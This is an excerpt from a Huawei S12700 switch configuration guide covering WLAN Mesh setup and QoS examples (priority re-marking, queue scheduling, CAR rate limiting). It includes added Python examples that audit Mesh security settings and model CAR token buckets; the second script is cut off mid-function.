Step 2 Configure the AC as a DHCP server to allocate IP addresses to APs.


[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 10.23.100.1 24
[AC-Vlanif100] dhcp select interface
[AC-Vlanif100] quit

Step 3 Configure the AP groups, country code, and AC's source interface.
# Create AP groups for MPPs and MPs respectively and add APs that require the same
configuration to the same group.
[AC] wlan
[AC-wlan-view] ap-group name mesh-mpp //Configure an AP group for MPPs.
[AC-wlan-ap-group-mesh-mpp] quit
[AC-wlan-view] ap-group name mesh-mp //Configure an AP group for MPs.
[AC-wlan-ap-group-mesh-mp] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP groups.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name mesh-mpp
[AC-wlan-ap-group-mesh-mpp] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-mesh-mpp] quit
[AC-wlan-view] ap-group name mesh-mp
[AC-wlan-ap-group-mesh-mp] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-mesh-mp] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Add AP_1 to the AP group mesh-mpp and AP_2 and AP_3 to the AP group mesh-mp.
NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 and radio 1.

[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 1 ap-mac 60de-4474-9640
[AC-wlan-ap-1] ap-name AP_1
[AC-wlan-ap-1] ap-group mesh-mpp
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-1] quit
[AC-wlan-view] ap-id 2 ap-mac 60de-4476-e360
[AC-wlan-ap-2] ap-name AP_2
[AC-wlan-ap-2] ap-group mesh-mp
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-2] quit
[AC-wlan-view] ap-id 3 ap-mac dcd2-fcf6-76a0
[AC-wlan-ap-3] ap-name AP_3
[AC-wlan-ap-3] ap-group mesh-mp
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-3] quit

Step 4 Configure Mesh parameters.

# Configure radio parameters for Mesh nodes. Radio 1 of the AP6010DN-AGN is used as an
example. coverage distance indicates the radio coverage distance parameter, which is 3 (unit:
100 m) by default. In this example, the radio coverage distance parameter is set to 4. You can
configure the parameter according to actual situations.
[AC-wlan-view] ap-group name mesh-mpp
[AC-wlan-ap-group-mesh-mpp] radio 1
[AC-wlan-group-radio-mesh-mpp/1] channel 40mhz-plus 157 //Configure the channel and bandwidth for Mesh links. All Mesh links on the same Mesh network must be configured with the same channel and bandwidth.
[AC-wlan-group-radio-mesh-mpp/1] coverage distance 4 //After the radio coverage distance parameter is configured based on distances between APs, the APs automatically adjust the values of slottime, acktimeout, and ctstimeout based on the configured distance parameter.
[AC-wlan-group-radio-mesh-mpp/1] quit
[AC-wlan-ap-group-mesh-mpp] quit
[AC-wlan-view] ap-group name mesh-mp
[AC-wlan-ap-group-mesh-mp] radio 1
[AC-wlan-group-radio-mesh-mp/1] channel 40mhz-plus 157
[AC-wlan-group-radio-mesh-mp/1] coverage distance 4
[AC-wlan-group-radio-mesh-mp/1] quit
[AC-wlan-ap-group-mesh-mp] quit

# Set parameters for the APs' wired interfaces. This example assumes that the service VLAN
is VLAN 101. Wired interfaces of all Mesh nodes are therefore added to VLAN 101 in tagged
mode.
[AC-wlan-view] wired-port-profile name wired-port
[AC-wlan-wired-port-wired-port] vlan tagged 101
[AC-wlan-wired-port-wired-port] quit

# Configure the security profile mesh-sec used by Mesh links. The Mesh network supports only the security policy WPA2+PSK+AES. The pass-phrase a1234567 is a placeholder for this example only: the PSK is shared by every Mesh node and, together with the Mesh ID and the Mesh whitelist, is what keeps a foreign AP off the backhaul, so use a long, random pass-phrase on a production network.
[AC-wlan-view] security-profile name mesh-sec
[AC-wlan-sec-prof-mesh-sec] security wpa2 psk pass-phrase a1234567 aes
[AC-wlan-sec-prof-mesh-sec] quit

# Configure a Mesh whitelist.


[AC-wlan-view] mesh-whitelist-profile name mesh-list
[AC-wlan-mesh-whitelist-mesh-list] peer-ap mac 60de-4474-9640
[AC-wlan-mesh-whitelist-mesh-list] peer-ap mac 60de-4476-e360
[AC-wlan-mesh-whitelist-mesh-list] peer-ap mac dcd2-fcf6-76a0
[AC-wlan-mesh-whitelist-mesh-list] quit

# Configure Mesh roles. Set the Mesh role of AP_1 to mesh-portal. AP_2 and AP_3 use the
default Mesh role mesh-node. Mesh roles are configured through the AP system profile.
[AC-wlan-view] ap-system-profile name mesh-sys
[AC-wlan-ap-system-prof-mesh-sys] mesh-role mesh-portal
[AC-wlan-ap-system-prof-mesh-sys] quit

# Configure a Mesh profile. Set the Mesh network ID to mesh-net, aging time of Mesh links
to 30s, and bind the security profile and Mesh whitelist to the Mesh profile.
[AC-wlan-view] mesh-profile name mesh-net
[AC-wlan-mesh-prof-mesh-net] mesh-id mesh-net //Only Mesh VAPs with the same Mesh network ID can set up Mesh links.
[AC-wlan-mesh-prof-mesh-net] link-aging-time 30
[AC-wlan-mesh-prof-mesh-net] security-profile mesh-sec
[AC-wlan-mesh-prof-mesh-net] quit

# Bind the Mesh whitelist profile to the AP radio.


[AC-wlan-view] ap-group name mesh-mpp
[AC-wlan-ap-group-mesh-mpp] radio 1
[AC-wlan-group-radio-mesh-mpp/1] mesh-whitelist-profile mesh-list
[AC-wlan-group-radio-mesh-mpp/1] quit
[AC-wlan-ap-group-mesh-mpp] quit
[AC-wlan-view] ap-group name mesh-mp
[AC-wlan-ap-group-mesh-mp] radio 1
[AC-wlan-group-radio-mesh-mp/1] mesh-whitelist-profile mesh-list
[AC-wlan-group-radio-mesh-mp/1] quit
[AC-wlan-ap-group-mesh-mp] quit

Step 5 Bind required profiles to the AP groups to make Mesh services take effect.
# Bind the AP wired port profile wired-port to AP groups mesh-mpp and mesh-mp to make
AP wired port parameters take effect on Mesh nodes. This example assumes that all APs
connect to Switch_A through GE0.
[AC-wlan-view] ap-group name mesh-mpp
[AC-wlan-ap-group-mesh-mpp] wired-port-profile wired-port gigabitethernet 0
[AC-wlan-ap-group-mesh-mpp] quit
[AC-wlan-view] ap-group name mesh-mp
[AC-wlan-ap-group-mesh-mp] wired-port-profile wired-port gigabitethernet 0
[AC-wlan-ap-group-mesh-mp] quit

# Bind the AP system profile mesh-sys to the AP group mesh-mpp to make the MPP role
take effect on AP_1.
[AC-wlan-view] ap-group name mesh-mpp
[AC-wlan-ap-group-mesh-mpp] ap-system-profile mesh-sys
[AC-wlan-ap-group-mesh-mpp] quit

# Bind the Mesh profile mesh-net to AP groups mesh-mpp and mesh-mp to make the Mesh
services take effect.
[AC-wlan-view] ap-group name mesh-mpp
[AC-wlan-ap-group-mesh-mpp] mesh-profile mesh-net radio 1
[AC-wlan-ap-group-mesh-mpp] quit
[AC-wlan-view] ap-group name mesh-mp
[AC-wlan-ap-group-mesh-mp] mesh-profile mesh-net radio 1
[AC-wlan-ap-group-mesh-mp] quit

Step 6 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 7 Verify the Mesh service configuration.


# After the configuration is complete, run the display ap all command to check whether Mesh
nodes go online successfully. If State displays as nor, APs have gone online successfully.
[AC-wlan-view] display ap all
Total AP information:
nor : normal [3]
------------------------------------------------------------------------------------------
ID MAC            Name Group    IP            Type         State STA Uptime
------------------------------------------------------------------------------------------
1  60de-4474-9640 AP_1 mesh-mpp 10.23.100.254 AP6010DN-AGN nor   0   13M:45S
2  60de-4476-e360 AP_2 mesh-mp  10.23.100.251 AP6010DN-AGN nor   0   5M:22S
3  dcd2-fcf6-76a0 AP_3 mesh-mp  10.23.100.253 AP6010DN-AGN nor   0   4M:14S
------------------------------------------------------------------------------------------
Total: 3

# After Mesh services take effect, run the display wlan mesh link all command to check
Mesh link information.
[AC-wlan-view] display wlan mesh link all
Rf   : radio ID                 Dis  : coverage distance(100m)
Ch   : channel                  Per  : drop percent(%)
TSNR : total SNR(dB)            P-   : peer
Mesh : Mesh mode                Re   : retry ratio(%)
RSSI : RSSI(dBm)                MaxR : max RSSI(dBm)
-------------------------------------------------------------------------------------------------
APName P-APName Rf Dis Ch  Mesh   P-Status RSSI MaxR Per Re TSNR SNR(Ch0~2:dB)
-------------------------------------------------------------------------------------------------
AP_1   AP_2     1  4   157 portal normal   -30  -27  0   12 67   62/65/-
AP_1   AP_3     1  4   157 portal normal   -26  -24  0   12 71   67/68/-
AP_3   AP_2     1  4   157 node   normal   -19  -3   0   5  77   66/76/-
AP_3   AP_1     1  4   157 node   normal   -32  -4   0   26 64   55/63/-
AP_2   AP_1     1  4   157 node   normal   -32  -4   0   12 64   62/61/-
AP_2   AP_3     1  4   157 node   normal   -14  -12  0   4  82   71/82/-
-------------------------------------------------------------------------------------------------
Total: 6

----End

Configuration Files
l Switch_A configuration file
#
sysname Switch_A
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
port-isolate enable group 1
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Switch_B configuration file


#
sysname Switch_B
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

l AC configuration file
#
sysname AC
#
vlan batch 100
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
capwap source interface vlanif100
#
wlan
security-profile name mesh-sec
security wpa2 psk pass-phrase %^%#WXq~51G1^G;~|`C\G$v-`XoiIe4z$CNAM#@TeN^+%^%# aes
mesh-whitelist-profile name mesh-list
peer-ap mac 60de-4474-9640
peer-ap mac 60de-4476-e360
peer-ap mac dcd2-fcf6-76a0
mesh-profile name mesh-net
security-profile mesh-sec
mesh-id mesh-net
link-aging-time 30
regulatory-domain-profile name domain1
ap-system-profile name mesh-sys
mesh-role mesh-portal
wired-port-profile name wired-port
vlan tagged 101
ap-group name mesh-mp
wired-port-profile wired-port gigabitethernet 0
regulatory-domain-profile domain1
radio 1
mesh-profile mesh-net
mesh-whitelist-profile mesh-list
channel 40mhz-plus 157
coverage distance 4
ap-group name mesh-mpp
ap-system-profile mesh-sys
wired-port-profile wired-port gigabitethernet 0
regulatory-domain-profile domain1
radio 1
mesh-profile mesh-net
mesh-whitelist-profile mesh-list
channel 40mhz-plus 157
coverage distance 4
ap-id 1 type-id 19 ap-mac 60de-4474-9640 ap-sn 210235554710CB000042
ap-name AP_1
ap-group mesh-mpp
ap-id 2 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235557610DB000046
ap-name AP_2
ap-group mesh-mp
ap-id 3 type-id 19 ap-mac dcd2-fcf6-76a0 ap-sn 210235419610D2000097
ap-name AP_3
ap-group mesh-mp
#
return
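Three settings in the AC configuration above decide which APs can join the Mesh backhaul: the security profile bound to the Mesh profile (WPA2+PSK+AES, one PSK shared by all nodes), the Mesh whitelist bound to each Mesh radio, and the ap-id registrations the whitelist should agree with. The following Python script is an added example, not part of the Huawei document and not the AC's own software. It parses an AC configuration from its indentation (the sample embedded in the script is this example's configuration file, reindented the way VRP nests views and with the plaintext pass-phrase from Step 4 in place of the encrypted string the AC prints) and reports the cases an auditor would want flagged: a Mesh profile without WPA2+PSK+AES, a Mesh radio with no whitelist, whitelist entries that are not registered APs, and Mesh-group APs missing from every whitelist. The 12-character pass-phrase minimum and the second, deliberately weakened configuration are assumptions constructed for the example.

```python
import re

# Constructed sample: the AC configuration file above, reindented the way VRP
# nests views (one more space per level) and with the plaintext pass-phrase
# from Step 4 in place of the encrypted string the AC prints.
SAMPLE_CONFIG = """\
wlan
 security-profile name mesh-sec
  security wpa2 psk pass-phrase a1234567 aes
 mesh-whitelist-profile name mesh-list
  peer-ap mac 60de-4474-9640
  peer-ap mac 60de-4476-e360
  peer-ap mac dcd2-fcf6-76a0
 mesh-profile name mesh-net
  security-profile mesh-sec
  mesh-id mesh-net
 ap-group name mesh-mp
  radio 1
   mesh-profile mesh-net
   mesh-whitelist-profile mesh-list
 ap-group name mesh-mpp
  radio 1
   mesh-profile mesh-net
   mesh-whitelist-profile mesh-list
 ap-id 1 ap-mac 60de-4474-9640
  ap-group mesh-mpp
 ap-id 2 ap-mac 60de-4476-e360
  ap-group mesh-mp
 ap-id 3 ap-mac dcd2-fcf6-76a0
  ap-group mesh-mp
"""
# Constructed weak variant: whitelist unbound from the mesh-mp radio, stale MAC left in the list.
WEAK_CONFIG = SAMPLE_CONFIG.replace(
    "   mesh-whitelist-profile mesh-list\n ap-group name mesh-mpp", " ap-group name mesh-mpp"
).replace("  peer-ap mac dcd2-fcf6-76a0\n", "  peer-ap mac dcd2-fcf6-76a0\n  peer-ap mac 0000-1111-2222\n")
MIN_PASSPHRASE = 12  # local policy assumption; WPA2-PSK itself only requires 8 characters


def parse_views(text):
    """Yield (enclosing view lines, line) for each config line, recovered from indentation."""
    stack = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "#":
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        while stack and stack[-1][0] >= indent:
            stack.pop()
        yield tuple(l for _, l in stack), line
        stack.append((indent, line))


def audit_mesh(text):
    """Return sorted findings about who is able to join the Mesh backhaul."""
    sec, wl, mesh, radios, ap_group = {}, {}, {}, {}, {}
    for path, line in parse_views(text):
        parent = path[-1] if path else ""
        name = parent.split()[-1] if parent else ""
        if parent.startswith("security-profile name ") and line.startswith("security "):
            sec[name] = line
        elif parent.startswith("mesh-whitelist-profile name ") and line.startswith("peer-ap mac "):
            wl.setdefault(name, set()).add(line.split()[-1])
        elif line.startswith("mesh-profile name "):
            mesh.setdefault(line.split()[-1], None)
        elif parent.startswith("mesh-profile name ") and line.startswith("security-profile "):
            mesh[name] = line.split()[-1]
        elif parent.startswith("radio ") and len(path) > 1 and path[-2].startswith("ap-group name "):
            radio = radios.setdefault((path[-2].split()[-1], name), {})
            if line.split()[0] in ("mesh-profile", "mesh-whitelist-profile"):
                radio[line.split()[0]] = line.split()[-1]
        elif parent.startswith("ap-id ") and line.startswith("ap-group "):
            m = re.search(r"ap-mac (\S+)", parent)
            if m:
                ap_group[m.group(1)] = line.split()[-1]

    findings = set()
    for mp, sp in mesh.items():  # 1. every Mesh profile must bind WPA2+PSK+AES
        policy = sec.get(sp, "")
        if not re.match(r"security wpa2 psk .* aes$", policy):
            findings.add(f"mesh-profile {mp}: security-profile {sp} is not WPA2+PSK+AES")
        m = re.search(r"pass-phrase (\S+)", policy)
        if m and not m.group(1).startswith("%^%#") and len(m.group(1)) < MIN_PASSPHRASE:
            findings.add(f"security-profile {sp}: pass-phrase shorter than {MIN_PASSPHRASE} characters")
    mesh_groups = set()
    for (group, radio), r in radios.items():  # 2. every Mesh radio must carry a whitelist
        if "mesh-profile" not in r:
            continue
        mesh_groups.add(group)
        if "mesh-whitelist-profile" not in r:
            findings.add(f"ap-group {group} radio {radio}: Mesh radio has no whitelist, any AP with the mesh-id and PSK can peer")
        for mac in wl.get(r.get("mesh-whitelist-profile"), set()) - set(ap_group):
            findings.add(f"whitelist {r['mesh-whitelist-profile']}: peer-ap {mac} is not a registered AP")
    for mac, group in ap_group.items():  # 3. every AP in a Mesh group must be whitelisted somewhere
        if group in mesh_groups and not any(mac in macs for macs in wl.values()):
            findings.add(f"AP {mac} in Mesh group {group} is in no whitelist and cannot form links")
    return sorted(findings)
```

Run against the page's own configuration the only finding is the short pass-phrase; against the weakened variant it also reports the unprotected mesh-mp radio and the stale whitelist entry. Encrypted pass-phrases (the `%^%#...%^%#` form the AC prints) cannot be judged from the configuration and are skipped.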


17 Typical QoS Configuration

About This Chapter

17.1 Example for Configuring Priority Re-marking and Queue Scheduling


17.2 Example for Configuring Interface-based Rate Limiting
17.3 Example for Configuring a Traffic Policy to Implement Rate Limiting
17.4 Example for Configuring Rate Limiting in a Specified Time Range
17.5 Example for Configuring Rate Limiting Based on VLAN IDs
17.6 Example for Configuring Traffic Shaping
17.7 Example for Configuring Congestion Avoidance and Congestion Management
17.8 Example for Configuring a Traffic Policy to Prevent Some Users from Accessing the
Internet at the Specified Time
17.9 Example for Configuring a Traffic Policy to Collect Statistics on Ping Packets
17.10 Example for Configuring a Traffic Policy to Implement Traffic Statistics
17.11 Example for Limiting Access Based on the Flow ID
17.12 Example for Configuring a Traffic Policy to Limit Access Between Network Segments
17.13 Example for Configuring HQoS

17.1 Example for Configuring Priority Re-marking and Queue Scheduling
Overview of Priority Re-marking and Queue Scheduling
After packets enter the device, the device assigns or modifies their priorities according to configured rules and then schedules them according to those priorities.
Priority re-marking lets you set or modify packet priorities manually, so that the queue scheduler on the outbound interface serves each class of traffic in the order you intend and the device's forwarding capacity goes to the traffic that matters most.

Configuration Notes

Table 17-1 Applicable product models and versions

Product | Product Model | Software Version
S12700 | S12708 and S12712 | V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
S12700 | S12704 | V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 17-1, a company has three services: data query, email processing, and file
transfer. The three services have different priorities. When HostA and HostB access servers of
the three services, data query, email processing, and file transfer need to be processed in
descending order of priority. Priority re-marking and queue scheduling can be configured on
the switch to meet the preceding requirement.

Figure 17-1 Networking of priority re-marking and queue scheduling (HostA, HostB and the Internet on the GE1/0/1 side of SwitchA; Data server 192.168.1.10, Email server 192.168.1.11 and FTP server 192.168.1.12 on the GE1/0/2 side)

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure traffic classifiers to classify packets based on servers' IP addresses.
2. Configure traffic behaviors and define priority re-marking.
3. Configure a traffic policy and bind the traffic policy to the traffic classifiers and traffic
behaviors, and apply the traffic policy to GE1/0/1 in the inbound direction to re-mark
priorities of incoming packets.
4. Configure PQ on GE1/0/2. PQ schedules packets in descending order of priority.

Procedure
Step 1 Configure ACLs to classify packets based on servers' IP addresses.
# Configure advanced ACL 3001 to classify packets with the destination IP address of
192.168.1.10.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] acl 3001
[SwitchA-acl-adv-3001] rule permit ip destination 192.168.1.10 0.0.0.0
[SwitchA-acl-adv-3001] quit

# Configure advanced ACL 3002 to classify packets with the destination IP address of
192.168.1.11.
[SwitchA] acl 3002
[SwitchA-acl-adv-3002] rule permit ip destination 192.168.1.11 0.0.0.0
[SwitchA-acl-adv-3002] quit

# Configure advanced ACL 3003 to classify packets with the destination IP address of 192.168.1.12.
[SwitchA] acl 3003
[SwitchA-acl-adv-3003] rule permit ip destination 192.168.1.12 0.0.0.0
[SwitchA-acl-adv-3003] quit

Step 2 Configure traffic classifiers to classify packets based on destination IP addresses.


# Configure a traffic classifier named dbserver to match packets with the destination IP
address of 192.168.1.10.
[SwitchA] traffic classifier dbserver operator and
[SwitchA-classifier-dbserver] if-match acl 3001 //Configure the device to match packets with the destination IP address of 192.168.1.10.
[SwitchA-classifier-dbserver] quit

# Configure a traffic classifier named mailserver to match packets with the destination IP
address of 192.168.1.11.
[SwitchA] traffic classifier mailserver operator and
[SwitchA-classifier-mailserver] if-match acl 3002 //Configure the device to match packets with the destination IP address of 192.168.1.11.
[SwitchA-classifier-mailserver] quit

# Configure a traffic classifier named ftpserver to match packets with the destination IP
address of 192.168.1.12.
[SwitchA] traffic classifier ftpserver operator and
[SwitchA-classifier-ftpserver] if-match acl 3003 //Configure the device to match packets with the destination IP address of 192.168.1.12.
[SwitchA-classifier-ftpserver] quit

Step 3 Configure traffic behaviors and define priority re-marking.


# Configure a traffic behavior named dbserver to re-mark packets destined for 192.168.1.10
with 4.
[SwitchA] traffic behavior dbserver
[SwitchA-behavior-dbserver] remark local-precedence 4 //Configure the device to re-mark the local priority of packets destined for 192.168.1.10 with 4.
[SwitchA-behavior-dbserver] quit

# Configure a traffic behavior named mailserver to re-mark packets destined for 192.168.1.11
with 3.
[SwitchA] traffic behavior mailserver
[SwitchA-behavior-mailserver] remark local-precedence 3 //Configure the device to re-mark the local priority of packets destined for 192.168.1.11 with 3.
[SwitchA-behavior-mailserver] quit

# Configure a traffic behavior named ftpserver to re-mark packets destined for 192.168.1.12
with 2.
[SwitchA] traffic behavior ftpserver
[SwitchA-behavior-ftpserver] remark local-precedence 2 //Configure the device to re-mark the local priority of packets destined for 192.168.1.12 with 2.
[SwitchA-behavior-ftpserver] quit

Step 4 Configure a traffic policy and bind the traffic classifiers and traffic behaviors to the traffic
policy.
[SwitchA] traffic policy policy1
[SwitchA-trafficpolicy-policy1] classifier dbserver behavior dbserver
[SwitchA-trafficpolicy-policy1] classifier mailserver behavior mailserver
[SwitchA-trafficpolicy-policy1] classifier ftpserver behavior ftpserver
[SwitchA-trafficpolicy-policy1] quit

Step 5 Apply the traffic policy to GE1/0/1 to re-mark priorities of incoming packets.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] traffic-policy policy1 inbound //Apply the traffic policy in the inbound direction.
[SwitchA-GigabitEthernet1/0/1] quit

Step 6 Configure PQ on GE1/0/2. PQ schedules packets in descending order of priority.


[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] qos pq //Configure PQ scheduling on the interface. In PQ mode, the device always schedules high-priority packets first.
[SwitchA-GigabitEthernet1/0/2] quit

Step 7 Verify the configuration.


# Check the traffic policy configuration.
[SwitchA] display traffic policy user-defined
User Defined Traffic Policy Information:
Policy: policy1
Classifier: dbserver
Operator: AND
Behavior: dbserver
Remark:
Remark local-precedence af4
Classifier: mailserver
Operator: AND
Behavior: mailserver
Remark:
Remark local-precedence af3
Classifier: ftpserver
Operator: AND
Behavior: ftpserver
Remark:
Remark local-precedence af2

Total policy number is 1

# Check the traffic policy record. The traffic policy has been successfully applied to GE1/0/1.
[SwitchA] display traffic-policy applied-record policy1
-------------------------------------------------
Policy Name: policy1
Policy Index: 0
Classifier:dbserver Behavior:dbserver
Classifier:mailserver Behavior:mailserver
Classifier:ftpserver Behavior:ftpserver
-------------------------------------------------
*interface GigabitEthernet1/0/1
traffic-policy policy1 inbound
slot 1 : success
-------------------------------------------------
Policy total applied times: 1.

----End

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
acl number 3001
rule 5 permit ip destination 192.168.1.10 0
acl number 3002
rule 5 permit ip destination 192.168.1.11 0
acl number 3003
rule 5 permit ip destination 192.168.1.12 0
#
traffic classifier dbserver operator and
if-match acl 3001

Issue 10 (2016-10-30) Huawei Proprietary and Confidential 1333


Copyright © Huawei Technologies Co., Ltd.
S12700 Series Agile Switches
Typical Configuration Examples 17 Typical QoS Configuration

traffic classifier ftpserver operator and


if-match acl 3003
traffic classifier mailserver operator and
if-match acl 3002
#
traffic behavior dbserver
remark local-precedence af4
traffic behavior ftpserver
remark local-precedence af2
traffic behavior mailserver
remark local-precedence af3
#
traffic policy policy1 match-order config
classifier dbserver behavior dbserver
classifier mailserver behavior mailserver
classifier ftpserver behavior ftpserver
#
interface GigabitEthernet1/0/1
traffic-policy policy1 inbound
#
interface GigabitEthernet1/0/2
qos pq
#
return

17.2 Example for Configuring Interface-based Rate Limiting
Overview of Interface-based Rate Limiting
Interface-based rate limiting limits the rate of all packets sent or received on an interface,
without differentiating between packet types. An interface with this function enabled is
assigned a fixed bandwidth; the control is coarse, since only a single mode is available, but the
configuration is simple.
Interface-based rate limiting in the inbound and outbound directions can be configured
simultaneously or separately.

Configuration Notes

Table 17-2 Applicable product models and versions

Product   Product Model       Software Version
S12700    S12708 and S12712   V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704              V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.


Networking Requirements
As shown in Figure 17-2, the Switch connects to the router through GE2/0/1. Enterprise
departments 1 and 2 connect to the Switch through GE1/0/1 and GE1/0/2 respectively and
access the Internet through the Switch and the router.
Only data services are transmitted on the network, so services do not need to be differentiated.
Because network bandwidth is limited, the bandwidth available to each department needs to be
limited: enterprise department 1 requires a CIR of 8 Mbit/s and a PIR of 10 Mbit/s, and
enterprise department 2 requires a CIR of 5 Mbit/s and a PIR of 8 Mbit/s.

Figure 17-2 Networking of interface-based rate limiting

(Figure not reproduced. Labels in the figure: Network, Router, GE2/0/1, Switch, GE1/0/1, GE1/0/2, SwitchA, SwitchB, Department 1, Department 2; traffic direction is toward the Network.)

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs and configure interfaces so that users can access the Internet through the
Switch.
2. Create different CAR profiles and configure the CIRs and PIRs in the CAR profiles, and
apply the CAR profiles to GE1/0/1 and GE1/0/2 on the Switch in the inbound direction
to limit the rate of packets from different enterprise departments.

Procedure
Step 1 Create VLANs and configure interfaces of the Switch.
# Create VLAN 100 and VLAN 200.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 100 200

# Configure GE1/0/1, GE1/0/2, and GE2/0/1 as trunk interfaces, and add GE1/0/1 to VLAN
100, GE1/0/2 to VLAN 200, and GE2/0/1 to VLAN 100 and VLAN 200.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk //Set the link type of the interface to trunk. The default link type of the interface is not trunk.

[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 200
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] port link-type trunk
[Switch-GigabitEthernet2/0/1] port trunk allow-pass vlan 100 200
[Switch-GigabitEthernet2/0/1] quit

Step 2 Configure CAR profiles.


# Create CAR profiles car1 and car2 on the Switch to limit the rate of traffic from enterprise
departments 1 and 2.
[Switch] qos car car1 cir 8192 pir 10240 //Set the CIR in the CAR profile car1 to 8 Mbit/s.
[Switch] qos car car2 cir 5120 pir 8192 //Set the CIR in the CAR profile car2 to 5 Mbit/s.

Step 3 Apply the CAR profiles.


# Apply the CAR profiles to GE1/0/1 and GE1/0/2 on the Switch in the inbound direction
respectively to limit the rate of traffic from enterprise departments 1 and 2.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] qos car inbound car1
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] qos car inbound car2
[Switch-GigabitEthernet1/0/2] quit
[Switch] quit

Step 4 Verify the configuration.


# Check the CAR profile configuration.
<Switch> display qos car all
----------------------------------------------------------------
CAR Name : car1
CAR Index : 0
car cir 8192 (Kbps) pir 10240 (Kbps) cbs 1024000 (byte) pbs 1280000 (byte)
----------------------------------------------------------------
CAR Name : car2
CAR Index : 1
car cir 5120 (Kbps) pir 8192 (Kbps) cbs 640000 (byte) pbs 1024000 (byte)

# Send traffic at rates of 6000 kbit/s, 9000 kbit/s, and 11000 kbit/s to GE1/0/1 and GE1/0/2,
and run the display qos car statistics command to view traffic statistics. At 6000 kbit/s, which
is below both PIRs, all packets on both interfaces are forwarded. At 9000 kbit/s, all packets on
GE1/0/1 are forwarded (9000 kbit/s is below the car1 PIR of 10240 kbit/s) and some packets on
GE1/0/2 are discarded (9000 kbit/s exceeds the car2 PIR of 8192 kbit/s). At 11000 kbit/s, which
exceeds both PIRs, some packets on both GE1/0/1 and GE1/0/2 are discarded.
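The forwarding and discard pattern in the verification step can be reproduced offline with a token-bucket model. The following Python script is an added example, not code from the Huawei documentation. It assumes that a CAR profile behaves as a colour-blind two-rate three-colour marker (RFC 2698) whose green and yellow packets pass and whose red packets are discarded, which is the "Color Mode: color Blind" / "green pass yellow pass red discard" behaviour shown in the display outputs of this chapter, and it derives the default burst sizes from the values printed in this chapter (cbs = 125 × cir bytes, pbs = 125 × pir bytes, i.e. one second of traffic at each rate); the switch hardware's exact marker is not stated on the page. The same model applies to the car action in a traffic behavior (sections 17.3 and 17.5), which takes the same parameters.

```python
"""Token-bucket model of the 'qos car' profiles car1 and car2 (added example)."""
from dataclasses import dataclass, field


@dataclass
class CarProfile:
    cir_kbps: int          # committed information rate, kbit/s
    pir_kbps: int          # peak information rate, kbit/s
    cbs: int = 0           # committed burst size, bytes (0 = derive a default)
    pbs: int = 0           # peak burst size, bytes (0 = derive a default)
    _tc: float = field(init=False, default=0.0, repr=False)   # tokens in C bucket
    _tp: float = field(init=False, default=0.0, repr=False)   # tokens in P bucket
    _last: float = field(init=False, default=0.0, repr=False)  # last arrival time

    def __post_init__(self) -> None:
        # Observation from the display outputs on this page (not a documented
        # rule): with cir and pir both given, cbs = 125 * cir and pbs = 125 * pir.
        self.cbs = self.cbs or 125 * self.cir_kbps
        self.pbs = self.pbs or 125 * self.pir_kbps
        self._tc = float(self.cbs)
        self._tp = float(self.pbs)

    def mark(self, now: float, size: int) -> str:
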